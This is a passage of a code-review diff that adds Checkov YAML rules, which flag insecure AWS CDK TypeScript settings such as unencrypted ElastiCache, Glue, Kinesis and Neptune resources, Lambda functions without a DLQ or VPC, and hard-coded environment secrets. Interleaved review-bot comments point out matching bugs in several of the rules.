atRestEncryptionEnabled: true , }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransit.yaml b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransit.yaml new file mode 100644 index 00000000000..9befa3ad7af --- /dev/null +++ b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransit.yaml 
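Review bot: The check name promises Application/Network coverage, but the pattern only matches `const $ELB = new $AWS.ApplicationLoadBalancer();`, so a `NetworkLoadBalancer` without a `logAccessLogs()` call is never reported, and an ALB declared with `let` or assigned to a class field is skipped as well. Add a second `or` branch for `NetworkLoadBalancer`, or bind the class as `$FUNC` with a `regex: (ApplicationLoadBalancer|NetworkLoadBalancer)` condition the way RDSMultiAZEnabled.yaml does, and consider dropping the `const` prefix so the declaration form does not matter.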
@@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_30 + name: Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnReplicationGroup() + conditions: + - not_pattern: | + new $AWS.CfnReplicationGroup(, {, transitEncryptionEnabled: true , }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.yaml b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.yaml new file mode 100644 index 00000000000..ab3500521b8 --- /dev/null +++ b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.yaml @@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_31 + name: Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnReplicationGroup() + conditions: + - not_pattern: | + new $AWS.CfnReplicationGroup(, {, transitEncryptionEnabled: true, , authToken: $VAR, }, ) + - not_pattern: | + new $AWS.CfnReplicationGroup(, {, authToken: $VAR, , transitEncryptionEnabled: true, }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ElasticsearchDomainEnforceHTTPS.yaml b/checkov/cdk/checks/typescript/ElasticsearchDomainEnforceHTTPS.yaml new file mode 100644 index 00000000000..4506663319c --- /dev/null +++ b/checkov/cdk/checks/typescript/ElasticsearchDomainEnforceHTTPS.yaml 
@@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_83 + name: Ensure Elasticsearch Domain enforces HTTPS + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.Domain() + conditions: + - not_pattern: | + new $AWS.Domain(, {, enforceHttps: true , }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ElasticsearchDomainLogging.yaml b/checkov/cdk/checks/typescript/ElasticsearchDomainLogging.yaml new file mode 100644 index 00000000000..3936e01b592 --- /dev/null +++ b/checkov/cdk/checks/typescript/ElasticsearchDomainLogging.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_84 + name: Ensure Elasticsearch Domain Logging is enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.Domain() + conditions: + - not_pattern: | + new $AWS.Domain(, {, logging: {, appLogEnabled: true, }, }, ) diff --git a/checkov/cdk/checks/typescript/ElasticsearchEncryption.yaml b/checkov/cdk/checks/typescript/ElasticsearchEncryption.yaml new file mode 100644 index 00000000000..b315ddca068 --- /dev/null +++ b/checkov/cdk/checks/typescript/ElasticsearchEncryption.yaml @@ -0,0 +1,22 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_5 + name: Ensure all data stored in the Elasticsearch is securely encrypted at rest + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_elasticsearch.CfnDomain(, , { }); + conditions: + - not_pattern: | + new $PACKAGE.aws_elasticsearch.CfnDomain(, , { , encryptionAtRestOptions: { , enabled: true, }, }); + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: "$X = { , enabled: false, }" + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_elasticsearch.CfnDomain.EncryptionAtRestOptionsProperty 
diff --git a/checkov/cdk/checks/typescript/ElasticsearchNodeToNodeEncryption.yaml b/checkov/cdk/checks/typescript/ElasticsearchNodeToNodeEncryption.yaml new file mode 100644 index 00000000000..fc9dbf3d2d9 --- /dev/null +++ b/checkov/cdk/checks/typescript/ElasticsearchNodeToNodeEncryption.yaml @@ -0,0 +1,22 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_6 + name: Ensure all Elasticsearch has node-to-node encryption enabled + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_elasticsearch.CfnDomain(, , { }); + conditions: + - not_pattern: | + new $PACKAGE.aws_elasticsearch.CfnDomain(, , { , nodeToNodeEncryptionOptions: { , enabled: true, }, }); + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: "$X = { , enabled: false, }" + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_elasticsearch.CfnDomain.NodeToNodeEncryptionOptionsProperty \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/GlueDataCatalogEncryption.yaml b/checkov/cdk/checks/typescript/GlueDataCatalogEncryption.yaml new file mode 100644 index 00000000000..a1a7eca23a7 --- /dev/null +++ b/checkov/cdk/checks/typescript/GlueDataCatalogEncryption.yaml 
@@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_94 + name: Ensure Glue Data Catalog Encryption is enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_glue.CfnDataCatalogEncryptionSettings(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_glue.CfnDataCatalogEncryptionSettings(, , { , dataCatalogEncryptionSettings: { , connectionPasswordEncryption :{ , returnConnectionPasswordEncrypted: true , }, , encryptionAtRest:{ , catalogEncryptionMode: "SSE-KMS", }, }, }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + $X = { , dataCatalogEncryptionSettings: { }, } + conditions: + - not_pattern: | + $X = { , dataCatalogEncryptionSettings: { , connectionPasswordEncryption: { , returnConnectionPasswordEncrypted: true, }, , encryptionAtRest: { , catalogEncryptionMode: "SSE-KMS", }, }, } + - metavariable: $X + type: aws-cdk-lib.aws_glue.CfnDataCatalogEncryptionSettingsProps diff --git a/checkov/cdk/checks/typescript/GlueSecurityConfiguration.yaml b/checkov/cdk/checks/typescript/GlueSecurityConfiguration.yaml new file mode 100644 index 00000000000..816afcbf2f0 --- /dev/null +++ b/checkov/cdk/checks/typescript/GlueSecurityConfiguration.yaml 
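Review bot: Both not_patterns in GlueDataCatalogEncryption.yaml require `connectionPasswordEncryption` to appear before `encryptionAtRest`; if the matcher is order-sensitive inside object literals, a props object that lists them the other way round is reported although it is fully encrypted. Whether it is order-sensitive is not visible here, but elsewhere in this set (ElasticacheReplicationGroupEncryptionAtTransitAuthToken.yaml, RedShiftSSL.yaml) both orderings were spelled out, which suggests it is; either add the reversed ordering here and in GlueSecurityConfiguration.yaml, or split the requirement into two independent not_patterns. GlueSecurityConfiguration.yaml also mixes `"SSE-KMS"` and `'SSE-KMS'` across its exclusions; pick one quote style unless the engine normalises string literals.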
@@ -0,0 +1,28 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_99 + name: Ensure Glue Security Configuration Encryption is enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_glue.CfnSecurityConfiguration(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_glue.CfnSecurityConfiguration(, , { , encryptionConfiguration: { , cloudWatchEncryption: { , cloudWatchEncryptionMode: 'SSE-KMS', }, , jobBookmarksEncryption: { , jobBookmarksEncryptionMode: 'CSE-KMS', }, , s3Encryptions: [ , { , s3EncryptionMode: 'SSE-KMS', }, ], }, }) + - not_pattern: | + new $PACKAGE.aws_glue.CfnSecurityConfiguration(, , { , encryptionConfiguration: { , cloudWatchEncryption: { , cloudWatchEncryptionMode: 'SSE-KMS', }, , jobBookmarksEncryption: { , jobBookmarksEncryptionMode: 'CSE-KMS', }, , s3Encryptions: [ , { , s3EncryptionMode: 'SSE-S3', }, ], }, }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: "$X = { , encryptionConfiguration: { }, }" + conditions: + - not_pattern: | + $X = { , encryptionConfiguration: { , cloudWatchEncryption: { , cloudWatchEncryptionMode: "SSE-KMS", }, , jobBookmarksEncryption: { , jobBookmarksEncryptionMode: 'CSE-KMS', }, , s3Encryptions: [ , { , s3EncryptionMode: 'SSE-KMS', }, ], }, } + - not_pattern: | + $X = { , encryptionConfiguration: { , cloudWatchEncryption: { , cloudWatchEncryptionMode: 'SSE-KMS', }, , jobBookmarksEncryption: { , jobBookmarksEncryptionMode: 'CSE-KMS', }, , s3Encryptions: [ , { , s3EncryptionMode: 'SSE-S3', }, ], }, } + - metavariable: $X + type: aws-cdk-lib.aws_glue.CfnSecurityConfigurationProps \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/GlueSecurityConfigurationEnabled.yaml b/checkov/cdk/checks/typescript/GlueSecurityConfigurationEnabled.yaml new file mode 100644 index 00000000000..e81e5acde2e --- /dev/null 
+++ b/checkov/cdk/checks/typescript/GlueSecurityConfigurationEnabled.yaml @@ -0,0 +1,49 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_195 + name: Ensure Glue component has a security configuration associated + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_glue.CfnCrawler(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_glue.CfnCrawler(, , { , crawlerSecurityConfiguration: $CON, } ) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: new $PACKAGE.aws_glue.CfnDevEndpoint(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_glue.CfnDevEndpoint(, , { , securityConfiguration: $VAL, }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: new $PACKAGE.aws_glue.CfnJob(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_glue.CfnJob(, , { , securityConfiguration: $VAL, }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: "$X = { }" + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_glue.CfnCrawlerProps + - not_pattern: | + $X = { , crawlerSecurityConfiguration: $VAL, } + - pattern: "$X = { }" + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_glue.CfnDevEndpointProps + - not_pattern: | + $X = { , securityConfiguration: $VAL, } + - pattern: "$X = { }" + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_glue.CfnJobProps + - not_pattern: | + $X = { , securityConfiguration: $VAL, } + diff --git a/checkov/cdk/checks/typescript/IAMPolicyAttachedToGroupOrRoles.yaml b/checkov/cdk/checks/typescript/IAMPolicyAttachedToGroupOrRoles.yaml new file mode 100644 index 00000000000..419fa1a26a4 --- /dev/null +++ b/checkov/cdk/checks/typescript/IAMPolicyAttachedToGroupOrRoles.yaml 
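Review bot: The CfnCrawler branch binds the property value as `$CON` while every other branch in this file uses `$VAL`; the bound value is never reused, so rename it, `crawlerSecurityConfiguration: $VAL, } )`, for consistency. The file also ends with an empty added line that none of the other checks carry.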
@@ -0,0 +1,28 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_40 + name: Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) + category: IAM + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: | + new $PACKAGE.aws_iam.Policy(, , { , users: , }) + conditions: + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + $P = new $PACKAGE.aws_iam.Policy() + + $P.attachToUser() + conditions: + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: "$X = { , users :, }" + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_iam.PolicyProps diff --git a/checkov/cdk/checks/typescript/KinesisStreamEncryptionType.yaml b/checkov/cdk/checks/typescript/KinesisStreamEncryptionType.yaml new file mode 100644 index 00000000000..27b742890a8 --- /dev/null +++ b/checkov/cdk/checks/typescript/KinesisStreamEncryptionType.yaml @@ -0,0 +1,24 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_43 + name: Ensure Kinesis Stream is securely encrypted + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_kinesis.CfnStream(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_kinesis.CfnStream(, , { , streamEncryption: { , encryptionType: "KMS", }, }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: "$X = { }" + conditions: + - not_pattern: | + $X = { , streamEncryption: { , encryptionType: "KMS", }, } + - metavariable: $X + type: aws-cdk-lib.aws_kinesis.CfnStreamProps diff --git a/checkov/cdk/checks/typescript/LambdaDLQConfigured.yaml b/checkov/cdk/checks/typescript/LambdaDLQConfigured.yaml new file mode 100644 index 00000000000..2ee96da3fde --- /dev/null +++ b/checkov/cdk/checks/typescript/LambdaDLQConfigured.yaml 
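Review bot: `name` in IAMPolicyAttachedToGroupOrRoles.yaml embeds a full rationale sentence in parentheses; the check name is rendered on every finding, so keep it to the one-line statement, `name: Ensure IAM policies are attached only to groups or roles`, and carry the rationale in the metadata `guideline` field or the docs entry instead. The `users :` spacing in the third pattern differs from `users: ` in the first; if the matcher is whitespace-sensitive around keys, align them.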
@@ -0,0 +1,48 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_116 + name: Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_lambda.Function(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_lambda.Function(, , { , deadLetterQueue: , , deadLetterQueueEnabled: true ,}) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: new $PACKAGE.aws_lambda.CfnFunction(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_lambda.CfnFunction(, , { , deadLetterConfig: , }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: new $PACKAGE.aws_sam.CfnFunction(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_sam.CfnFunction(, , { , deadLetterQueue: , }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: $X = { } + conditions: + - not_pattern: | + $X = { , deadLetterQueue: , , deadLetterQueueEnabled: true ,} + - metavariable: $X + type: aws-cdk-lib.aws_lambda.FunctionProps + - pattern: $X = { } + conditions: + - not_pattern: | + $X = { , deadLetterConfig: , } + - metavariable: $X + type: aws-cdk-lib.aws_lambda.CfnFunctionProps + - pattern: $X = { } + conditions: + - not_pattern: | + $X = { , deadLetterQueue: , } + - metavariable: $X + type: aws-cdk-lib.aws_sam.CfnFunctionProps \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/LambdaEnvironmentCredentials.yaml b/checkov/cdk/checks/typescript/LambdaEnvironmentCredentials.yaml new file mode 100644 index 00000000000..a359e1691f9 --- /dev/null +++ b/checkov/cdk/checks/typescript/LambdaEnvironmentCredentials.yaml 
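Review bot: The `aws_lambda.Function` exclusion requires both `deadLetterQueue:` and `deadLetterQueueEnabled: true`, in that order, but in the L2 construct either prop alone configures a DLQ (`deadLetterQueueEnabled: true` creates a queue; passing `deadLetterQueue` implies enabled), so a function with just one of them is reported. Split it into two not_patterns, `new $PACKAGE.aws_lambda.Function(, , { , deadLetterQueue: , })` and `new $PACKAGE.aws_lambda.Function(, , { , deadLetterQueueEnabled: true ,})`, and do the same for the `FunctionProps` branch further down.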
@@ -0,0 +1,38 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_45 + name: Ensure no hard-coded secrets exist in lambda environment + category: SECRETS + framework: cdk +scope: + languages: + - typescript +definition: + or: + - patterns: + or: + - pattern: | + new $PACKAGE.aws_lambda.Function( ,, { , environment: { $ARG1:'$ARG2' }, }) + - pattern: | + new $PACKAGE.aws_lambda.CfnFunction( ,, { , environment: { , variables: { $ARG1:'$ARG2'}, }, }) + - pattern: | + new $PACKAGE.aws_sam.CfnFunction( ,, { , environment: { , variables: { $ARG1:'$ARG2'}, }, }) + conditions: + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + $X = { , environment: { $ARG1:'$ARG2' }, } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_lambda.FunctionProps + - pattern: | + $X = { , environment: { , variables: { $ARG1:'$ARG2'}, }, } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_lambda.CfnFunctionProps + - pattern: | + $X = { , environment: { , variables: { $ARG1:'$ARG2'}, }, } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_sam.CfnFunctionProps diff --git a/checkov/cdk/checks/typescript/LambdaEnvironmentEncryptionSettings.yaml b/checkov/cdk/checks/typescript/LambdaEnvironmentEncryptionSettings.yaml new file mode 100644 index 00000000000..eb2a4279cc2 --- /dev/null +++ b/checkov/cdk/checks/typescript/LambdaEnvironmentEncryptionSettings.yaml 
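Review bot: Every pattern in LambdaEnvironmentCredentials.yaml fires on any `environment` entry with a string-literal value (`$ARG1:'$ARG2'`), so `LOG_LEVEL: 'info'` is reported as a hard-coded secret exactly like a real credential; nothing constrains `$ARG1` or `$ARG2`. Add a `metavariable: $ARG1` condition with a `regex` over credential-like names, the way RDSMultiAZEnabled.yaml constrains `$FUNC`, so the finding rate stays usable. The `patterns: or:` wrapper on the first branch also differs from the bare `or:` used in every other file here.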
@@ -0,0 +1,66 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_173 + name: Check encryption settings for Lambda environmental variable + category: Encryption + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: | + new $PACKAGE.aws_lambda.Function(, , { , environment: { , $ARG1:'$ARG2', }, } ) + conditions: + - not_pattern: | + new $PACKAGE.aws_lambda.Function(, , { , environment: { , $ARG1:'$ARG2', }, , environmentEncryption: $KMS, }) + - not_pattern: | + new $PACKAGE.aws_lambda.Function(, , { , environmentEncryption: $KMS, , environment: { , $ARG1:'$ARG2', }, }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + new $PACKAGE.aws_lambda.CfnFunction(, , { , environment: { , variables: { , $ARG1:'$ARG2', }, }, }) + conditions: + - not_pattern: | + new $PACKAGE.aws_lambda.CfnFunction(, , { , environment: { , variables: { $ARG1:'$ARG2' }, }, , kmsKeyArn: $KMS, }) + - not_pattern: | + new $PACKAGE.aws_lambda.CfnFunction(, , { , kmsKeyArn: $KMS, , environment: { , variables: { , $ARG1:'$ARG2', }, }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + new $PACKAGE.aws_sam.CfnFunction(, , { , environment: { , variables: { $ARG1:'$ARG2'}, }, }) + conditions: + - not_pattern: | + new $PACKAGE.aws_sam.CfnFunction(, , { , environment: { , variables: { $ARG1:'$ARG2'}, , kmsKeyArn: $KMS, }, }) + - not_pattern: | + new $PACKAGE.aws_sam.CfnFunction(, , { , kmsKeyArn: $KMS, , environment: { , variables: { , $ARG1:'$ARG2', }, }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + $X = { , environment: { $ARG1:'$ARG2' }, } + conditions: + - not_pattern: | + $X = { , environment: { , $ARG1:'$ARG2', }, , environmentEncryption: $KMS, } + - not_pattern: | + $X = { , environmentEncryption: $KMS, , environment: { , $ARG1:'$ARG2', }, } + - metavariable: $X + type: aws-cdk-lib.aws_lambda.FunctionProps + - pattern: | + $X = { , environment: { , 
variables: { , $ARG1:'$ARG2', }, }, } + conditions: + - not_pattern: | + $X = { , environment: { , variables: { , $ARG1:'$ARG2', }, }, , kmsKeyArn: $KMS, } + - not_pattern: | + $X = { , kmsKeyArn: $KMS, , environment: { , variables: { , $ARG1:'$ARG2', }, }, } + - metavariable: $X + type: aws-cdk-lib.aws_lambda.CfnFunctionProps + - pattern: | + $X = { , environment: { , variables: { , $ARG1:'$ARG2', }, }, } + conditions: + - not_pattern: | + $X = { , environment: { , variables: { , $ARG1:'$ARG2', }, , kmsKeyArn: $KMS, }, } + - not_pattern: | + $X = { , kmsKeyArn: $KMS, , environment: { , variables: { , $ARG1:'$ARG2', }, }, } + - metavariable: $X + type: aws-cdk-lib.aws_sam.CfnFunctionProps \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/LambdaFunctionLevelConcurrentExecutionLimit.yaml b/checkov/cdk/checks/typescript/LambdaFunctionLevelConcurrentExecutionLimit.yaml new file mode 100644 index 00000000000..cfe66be7480 --- /dev/null +++ b/checkov/cdk/checks/typescript/LambdaFunctionLevelConcurrentExecutionLimit.yaml 
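Review bot: Two exclusions in LambdaEnvironmentEncryptionSettings.yaml are unbalanced: the second `aws_lambda.CfnFunction` not_pattern `new $PACKAGE.aws_lambda.CfnFunction(, , { , kmsKeyArn: $KMS, , environment: { , variables: { , $ARG1:'$ARG2', }, })` and the second `aws_sam.CfnFunction` one open three braces and close two, so they will not parse as the object literal they are meant to exclude and the kmsKeyArn-first ordering is always reported. Add the missing `}` before the `)` in both. In the `aws_sam.CfnFunction` and `aws_sam.CfnFunctionProps` branches the first exclusion places `kmsKeyArn: $KMS` inside `environment` while the second places it at the top level; for a SAM function `kmsKeyArn` is a top-level property, so the first form never matches real code. The hunk starts on the previous line.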
@@ -0,0 +1,51 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_115 + name: Ensure that AWS Lambda function is configured for function-level concurrent execution limit + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_lambda.Function(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_lambda.Function(, , { , reservedConcurrentExecutions: $NUM, }, ) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: new $PACKAGE.aws_lambda.CfnFunction(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_lambda.CfnFunction(, , { , "reservedConcurrentExecutions": $NUM, }, ) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: new $PACKAGE.aws_sam.CfnFunction(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_sam.CfnFunction(, , { , reservedConcurrentExecutions: $NUM, }, ) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + $X = { } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_lambda.FunctionProps + - not_pattern: | + $X = { , reservedConcurrentExecutions: $NUM, } + - pattern: | + $X = { } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_lambda.CfnFunctionProps + - not_pattern: | + $X = { , reservedConcurrentExecutions: $NUM, } + - pattern: | + $X = { } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_sam.CfnFunctionProps + - not_pattern: | + $X = { , reservedConcurrentExecutions: $NUM, } diff --git a/checkov/cdk/checks/typescript/LambdaInVPC.yaml b/checkov/cdk/checks/typescript/LambdaInVPC.yaml new file mode 100644 index 00000000000..41d830ff169 --- /dev/null +++ b/checkov/cdk/checks/typescript/LambdaInVPC.yaml 
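Review bot: The `aws_lambda.CfnFunction` exclusion spells the key as a string literal, `"reservedConcurrentExecutions": $NUM`, while every other exclusion in this file uses the bare identifier; if the matcher compares property keys syntactically, the quoted form never unifies with a bare `reservedConcurrentExecutions:` in user code and every CfnFunction is reported regardless of its setting. Write it as `new $PACKAGE.aws_lambda.CfnFunction(, , { , reservedConcurrentExecutions: $NUM, }, )` to match the sibling branches.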
@@ -0,0 +1,51 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_117 + name: Ensure that AWS Lambda function is configured inside a VPC + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_lambda.Function(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_lambda.Function(, , { , vpc: , } ) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: new $PACKAGE.aws_lambda.CfnFunction(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_lambda.CfnFunction(, , { , vpcConfig: , } ) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: new $PACKAGE.aws_sam.CfnFunction(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_sam.CfnFunction(, , { , vpcConfig: , } ) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + $X = { } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_lambda.FunctionProps + - not_pattern: | + $X = { , vpc: , } + - pattern: | + $X = { } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_lambda.CfnFunctionProps + - not_pattern: | + $X = { , vpcConfig: , } + - pattern: | + $X = { } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_sam.CfnFunctionProps + - not_pattern: | + $X = { , vpcConfig: , } diff --git a/checkov/cdk/checks/typescript/LaunchConfigurationEBSEncryption.yaml b/checkov/cdk/checks/typescript/LaunchConfigurationEBSEncryption.yaml new file mode 100644 index 00000000000..8d3ba9295ef --- /dev/null +++ b/checkov/cdk/checks/typescript/LaunchConfigurationEBSEncryption.yaml 
@@ -0,0 +1,22 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_8 + name: Ensure all data stored in the Launch configuration EBS is securely encrypted + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: | + new $PACKAGE.aws_autoscaling.CfnLaunchConfiguration(, , { , blockDeviceMappings: [, { , 'ebs':{ , 'encrypted': false, }, } ,], }) + conditions: + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + $X = { , blockDeviceMappings: [, { , 'ebs':{ , 'encrypted': false, }, } ,], } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_autoscaling.CfnLaunchConfigurationProps diff --git a/checkov/cdk/checks/typescript/NeptuneClusterStorageEncrypted.yaml b/checkov/cdk/checks/typescript/NeptuneClusterStorageEncrypted.yaml new file mode 100644 index 00000000000..06d96fcf8a7 --- /dev/null +++ b/checkov/cdk/checks/typescript/NeptuneClusterStorageEncrypted.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_44 + name: Ensure Neptune storage is securely encrypted + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: new $PACKAGE.aws_neptune.CfnDBCluster(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_neptune.CfnDBCluster(, , { , storageEncrypted: true, }) + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" + - pattern: | + $X = { } + conditions: + - metavariable: $X + type: aws-cdk-lib.aws_neptune.CfnDBClusterProps + - not_pattern: | + $X = { , storageEncrypted: true, } diff --git a/checkov/cdk/checks/typescript/RDSEnhancedMonitorEnabled.yaml b/checkov/cdk/checks/typescript/RDSEnhancedMonitorEnabled.yaml new file mode 100644 index 00000000000..d8328fda9db --- /dev/null +++ b/checkov/cdk/checks/typescript/RDSEnhancedMonitorEnabled.yaml 
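Review bot: LaunchConfigurationEBSEncryption.yaml only fires on an explicit `'encrypted': false`; a `blockDeviceMappings` entry whose `ebs` block omits `encrypted` passes silently, although that is the unencrypted case unless the account default or the source snapshot is encrypted, and it is the form the other checks in this set catch through a not_pattern. Consider `pattern: new $PACKAGE.aws_autoscaling.CfnLaunchConfiguration(, , { , blockDeviceMappings: [, { , ebs: { }, } ,], })` with a not_pattern for `encrypted: true`, and use bare keys rather than `'ebs'`/`'encrypted'` as the rest of the files do, since it is not clear the matcher treats the quoted and bare forms alike.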
@@ -0,0 +1,19 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_118 + name: Ensure that enhanced monitoring is enabled for Amazon RDS instances + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $PACKAGE.aws_rds.DatabaseInstance(, , { }) + conditions: + - not_pattern: | + new $PACKAGE.aws_rds.DatabaseInstance(, , { , monitoringInterval: $COUNT, }) + - metavariable: $COUNT # bug: should preform with not_pattern and not after BCE-33034 + comparison: $COUNT > 0 + - metavariable: $PACKAGE + comparison: $PACKAGE == "aws-cdk-lib" diff --git a/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml b/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml new file mode 100644 index 00000000000..e4e33ea9ae7 --- /dev/null +++ b/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_157 + name: Ensure that RDS instances have Multi-AZ enabled + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $FUNC(, 